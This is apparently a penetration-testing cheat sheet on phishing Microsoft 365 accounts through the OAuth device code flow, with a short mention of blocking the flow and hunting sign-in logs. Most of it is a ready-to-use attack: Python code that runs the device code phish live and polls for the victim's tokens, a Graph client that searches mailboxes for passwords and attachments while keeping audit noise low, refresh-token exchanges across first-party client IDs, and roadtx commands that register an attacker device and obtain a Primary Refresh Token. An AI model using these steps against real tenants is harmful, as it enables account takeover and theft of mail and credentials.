- Microsoft Azure
- Introducing a new phishing technique for compromising Office 365 accounts (AADInternals)
Device code phishing
Device code phishing relies on a legitimate Microsoft authentication endpoint that ends up delivering the victim's tokens to the attacker. It abuses the OAuth 2.0 device authorization grant (RFC 8628, the "device code flow"), which is intended for input-constrained devices (smart TVs, printers) that cannot host a browser login: the device shows a short code, the user enters it on another device, and the first device polls the token endpoint until the login completes. In the phish, the attacker plays the role of the device. The victim signs in on the real login page (MFA included), so no password is typed into an attacker-controlled site; the attacker simply receives the resulting tokens. Defenders can block the flow with a Conditional Access policy on the authentication flows condition (device code flow) and hunt sign-in logs for the "Device Code" authentication protocol.
- The attacker requests a device code from the Entra ID /devicecode endpoint. The response contains a device_code (kept by the attacker for polling) and a user_code; both are valid for only 15 minutes.
- The attacker sends the user code to the victim in a phishing email and keeps polling the token endpoint in the background.
- The victim opens the legitimate website https://microsoft.com/devicelogin, only needs to provide the code, and then signs in as usual.
- The attacker's poll returns a valid access token (about 60 minutes) and a refresh token (up to 90 days) issued for the victim to the client application the attacker chose (e.g. Teams, Outlook, SharePoint, etc.).
Testing
A device code can be requested by POSTing client_id and resource to the following (v1.0) endpoint; the response carries the user_code for the victim, the device_code the attacker polls with, and expires_in (900 seconds):
https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0
The access token (a JWT) obtained this way is scoped to a single resource; check its aud and scp claims before using it. The refresh token, however, can be redeemed for access tokens to other resources and, because Microsoft's first-party clients belong to one "family" (FOCI), for other well-known first-party client IDs as well. We simply need to use it to obtain a token for a client and resource that has the right to query the Graph APIs.
Open a PowerShell console (TenantId is the victim tenant's ID, visible in the tid claim of the access token):
Import-Module AADInternals
$t = Get-AADIntAccessTokenWithRefreshToken -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://graph.microsoft.com" -TenantId "<tenant-id>" -RefreshToken "<token>" -SaveToCache $true -IncludeRefreshToken $true
Write-Output $t
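The same two steps in code, as an added example that is not from the page, AADInternals or Microsoft: the v1.0 device code flow described above (request the code, poll with RFC 8628 error handling), then the refresh-token exchange the PowerShell command performs, plus a claims check on the resulting token. The HTTP transport is a parameter so the whole thing runs offline against scripted responses; parameter and field names follow Microsoft's v1.0 endpoint documentation, and every token, code and URL inside offline_demo() is constructed.

```python
# Added example (not code from the page, AADInternals or Microsoft): v1.0 device
# code flow + refresh-token exchange + claims check, runnable offline because the
# transport is injectable. All values in offline_demo() are constructed.
import base64
import json
import time
import urllib.error
import urllib.parse
import urllib.request

AUTHORITY = "https://login.microsoftonline.com/common"
DEVICECODE_URL = AUTHORITY + "/oauth2/devicecode?api-version=1.0"
TOKEN_URL = AUTHORITY + "/oauth2/token?api-version=1.0"
GRAPH = "https://graph.microsoft.com"
GRAPH_APP_ID = "00000003-0000-0000-c000-000000000000"   # aud alias for Graph
OFFICE_CLIENT = "d3590ed6-52b3-4102-aeff-aad2292ab01c"  # "Microsoft Office" (table below)
DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"

def http_post_form(url, fields):
    """Real transport: POST a form, return the JSON body even on HTTP 400
    (Entra reports authorization_pending and friends with a 400)."""
    req = urllib.request.Request(
        url, data=urllib.parse.urlencode(fields).encode(), method="POST")
    try:
        with urllib.request.urlopen(req) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.load(err)

def scripted_post(responses):
    """Offline transport: hands back constructed responses in order."""
    queue = list(responses)
    return lambda url, fields: queue.pop(0)

def request_device_code(post, client_id=OFFICE_CLIENT, resource=GRAPH):
    """Step 1: user_code goes in the phishing mail, device_code stays with the attacker."""
    body = post(DEVICECODE_URL, {"client_id": client_id, "resource": resource})
    return {"user_code": body["user_code"], "device_code": body["device_code"],
            "url": body.get("verification_url") or body.get("verification_uri"),
            "expires_in": int(body.get("expires_in", 900)),   # the 15-minute window
            "interval": int(body.get("interval", 5))}

def poll_for_tokens(post, code, client_id=OFFICE_CLIENT, resource=GRAPH, sleep=time.sleep):
    """Step 2: poll until the victim enters the code or it expires."""
    interval, waited = code["interval"], 0
    while waited < code["expires_in"]:
        body = post(TOKEN_URL, {"grant_type": DEVICE_CODE_GRANT, "client_id": client_id,
                                "resource": resource, "code": code["device_code"]})
        if "access_token" in body:
            return body                      # access_token, refresh_token, expires_in, ...
        error = body.get("error")
        if error == "slow_down":             # RFC 8628: back off by 5 s
            interval += 5
        elif error != "authorization_pending":
            raise RuntimeError(f"device code flow ended: {error}")
        sleep(interval)
        waited += interval
    raise TimeoutError("user_code expired before the victim used it")

def exchange_refresh_token(post, refresh_token, client_id, resource=GRAPH):
    """Step 3: redeem the refresh token for an access token to another resource."""
    body = post(TOKEN_URL, {"grant_type": "refresh_token", "client_id": client_id,
                            "resource": resource, "refresh_token": refresh_token})
    if "access_token" not in body:
        raise RuntimeError(f"refresh failed: {body.get('error')}")
    return body

def jwt_claims(token):
    """Decode a JWT payload without verifying it (we only inspect our own token)."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))

def can_read_mail(access_token):
    """True if the token is for Graph and carries a Mail.* delegated scope."""
    claims = jwt_claims(access_token)
    scopes = set(claims.get("scp", "").split())
    return claims.get("aud") in (GRAPH, GRAPH_APP_ID) and bool(scopes & {"Mail.Read", "Mail.ReadWrite"})

def unsigned_jwt(claims):
    """alg=none JWT for the offline demo only; Entra would never issue or accept one."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."

def offline_demo():
    """Whole flow on constructed responses: the first token lacks Mail.Read,
    so the refresh token is exchanged; returns the token response that can read mail."""
    limited = unsigned_jwt({"aud": GRAPH, "scp": "User.Read"})
    extended = unsigned_jwt({"aud": GRAPH, "scp": "Mail.Read User.Read"})
    post = scripted_post([
        {"user_code": "ABCD1234", "device_code": "dev-code-0001", "expires_in": "900",
         "interval": "5", "verification_url": "https://microsoft.com/devicelogin"},
        {"error": "authorization_pending"},   # victim has not entered the code yet
        {"error": "slow_down"},               # we polled too fast
        {"access_token": limited, "refresh_token": "rt-0001", "expires_in": "3599"},
        {"access_token": extended, "refresh_token": "rt-0002", "expires_in": "3599"},
    ])
    code = request_device_code(post)
    tokens = poll_for_tokens(post, code, sleep=lambda _: None)
    if not can_read_mail(tokens["access_token"]):
        tokens = exchange_refresh_token(post, tokens["refresh_token"], OFFICE_CLIENT)
    return tokens
```

For a live run, pass http_post_form as the transport: request_device_code() gives the code for the mail, poll_for_tokens() blocks until the victim completes the login, and can_read_mail() tells you whether the token can hit /me/messages or whether an exchange_refresh_token() call is needed first.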
The client ID is the well-known, first-party ID of the Microsoft 365 application whose token you want; the table below lists common ones. Note that GET /v1.0/applications enumerates the tenant's own app registrations (not these first-party clients), which is still useful to discover applications specific to the victim tenant:
GET /v1.0/applications HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <token>
| Microsoft 365 client application | Client ID |
|---|---|
| Teams desktop, mobile | 1fec8e78-bce4-4aaf-ab1b-5451cc387264 |
| Teams web | 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 |
| Microsoft 365 web | 4765445b-32c6-49b0-83e6-1d93765276ca |
| Microsoft 365 desktop | 0ec893e0-5785-4de6-99da-4ed124e5296c |
| Microsoft 365 mobile | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| Outlook desktop | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| Outlook web | bc59ab01-8403-45c6-8796-ac3ef710b3e3 |
| Outlook mobile | 27922004-5251-4030-b22d-91ecd9a37ea4 |
The newly obtained Graph token gives access to this:
GET /v1.0/me HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <new token>
Read emails remotely (a KQL search over the mailbox, here for messages whose body contains "password"; results are paged, follow @odata.nextLink for the rest):
GET /v1.0/me/messages?$search="body:password" HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <new token>
See also MsGraphFunzy (GitHub, Charles Hamilton) to dump emails through the Microsoft Graph API. It produces an HTML report with all extracted information, including the email attachments:
python3 graph_dump.py azure.token body:password
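The mailbox search above as a small client, added here as an example that is not the page's, Microsoft's or MsGraphFunzy's code: it issues the $search request with the stolen token and follows @odata.nextLink, since one page never holds the full result set. The transport is injectable; the two Graph pages, addresses and subjects in offline_demo() are constructed.

```python
# Added example (not code from the page, Microsoft or MsGraphFunzy): Graph
# mailbox search with nextLink paging, runnable offline on constructed pages.
import json
import urllib.parse
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"

def http_get_json(url, token):
    """Real transport: GET with the bearer token, return the parsed JSON body."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def scripted_get(pages):
    """Offline transport: returns constructed pages in order, ignoring the URL."""
    queue = list(pages)
    return lambda url, token: queue.pop(0)

def search_messages(token, kql, get=http_get_json, max_pages=50):
    """Return sender, subject, attachment flag and id of every message matching a KQL query."""
    url = f"{GRAPH}/me/messages?" + urllib.parse.urlencode({
        "$search": f'"{kql}"',
        "$select": "id,subject,from,hasAttachments,receivedDateTime"})
    hits = []
    for _ in range(max_pages):          # bound the walk in case nextLink never ends
        page = get(url, token)
        for m in page.get("value", []):
            hits.append({"id": m["id"], "subject": m.get("subject", ""),
                         "from": (m.get("from") or {}).get("emailAddress", {}).get("address"),
                         "attachments": bool(m.get("hasAttachments")),
                         "received": m.get("receivedDateTime")})
        url = page.get("@odata.nextLink")
        if not url:
            break
    return hits

def with_attachments(hits):
    """Message ids worth a follow-up GET /me/messages/{id}/attachments."""
    return [h["id"] for h in hits if h["attachments"]]

def offline_demo():
    """Two constructed pages for $search="body:password"; the first carries a nextLink."""
    page1 = {"value": [
        {"id": "AAMk1", "subject": "VPN onboarding", "hasAttachments": True,
         "receivedDateTime": "2024-03-01T08:00:00Z",
         "from": {"emailAddress": {"address": "it-helpdesk@example.com"}}},
        {"id": "AAMk2", "subject": "Re: shared account", "hasAttachments": False,
         "receivedDateTime": "2024-03-02T09:30:00Z",
         "from": {"emailAddress": {"address": "colleague@example.com"}}}],
        "@odata.nextLink": f"{GRAPH}/me/messages?$search=%22body%3Apassword%22&$skiptoken=constructed"}
    page2 = {"value": [
        {"id": "AAMk3", "subject": "Password reset", "hasAttachments": False,
         "receivedDateTime": "2024-03-03T10:00:00Z",
         "from": {"emailAddress": {"address": "noreply@example.com"}}}]}
    return search_messages("<new token>", "body:password", get=scripted_get([page1, page2]))
```

With a real token, call search_messages(token, "body:password") and then fetch attachments only for the ids with_attachments() returns, which keeps the number of Graph calls (and the noise in the audit trail) down.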
Dynamic device code phishing
Same as device code phishing, but it works around the 15-minute validity: instead of a static code in the email, the victim is sent to an attacker-controlled web page (directly or via a QR code in the email) whose JavaScript requests a fresh device code the moment the victim arrives and displays it, so the code is always inside its validity window when the victim enters it.
Primary Refresh Token (PRT) phishing
The Primary Refresh Token (PRT) is the Entra ID counterpart of a Kerberos TGT: a long-lived, OAuth-based refresh token used for SSO on Entra-joined, registered and hybrid-joined devices. It is valid for 14 days and renewed continuously while the device is in use, and it binds a user identity to a device identity, so whoever holds it can get tokens for any application as that user from that "device".
The attack is a device code phish that requests a token for the Microsoft Authentication Broker client (well-known client ID 29d9ed98-a469-4536-ade2-f981bc1d605e), then uses the resulting refresh token to register an attacker-controlled device and request a PRT for it.
Testing
Use roadtx (GitHub, dirkjanm/roadtools).
git clone https://github.com/dirkjanm/roadtools.git
cd roadtools/
python3 -m venv .venv
.venv/bin/pip install setuptools
.venv/bin/pip install -e roadlib/
.venv/bin/pip install -e roadtx/
# Run roadtx
export PATH="$PATH:$(pwd)/.venv/bin"
roadtx
# Help
roadtx gettokens --help
The following command outputs a device code (use the broker client ID and keep the resource as shown):
roadtx gettokens -c <client-id> -r https://enrollment.manage.microsoft.com/ --device-code
Keep roadtx running. The victim goes to https://microsoft.com/devicelogin and enters the device code (from roadtx) received in the phishing email. roadtx receives the tokens (access token + refresh token) and writes them to the file ".roadtools_auth":
cat .roadtools_auth
Exchange the refresh token for a Device Registration Service (DRS) token:
roadtx refreshtokento -r drs
Register the attacker's device in the victim tenant. This generates "<device name>.key" and "<device name>.pem":
roadtx device -a register -n hackerlaptop
Obtain a Primary Refresh Token (PRT) for that device, which gives access to every application the user can reach. roadtx prints the PRT and saves it to the file "roadtx.prt":
roadtx prt --refresh-token file -c hackerlaptop.pem -k hackerlaptop.key
With the PRT, roadtx can drive a Selenium browser (roadtx browserprtauth) to access any app (e.g. Outlook, Teams, Azure Portal, etc.) as the victim.
Roadtx
If valid credentials are already known, roadtx can also obtain tokens directly with a username and password (no device code phishing needed):
roadtx gettokens -u username -p password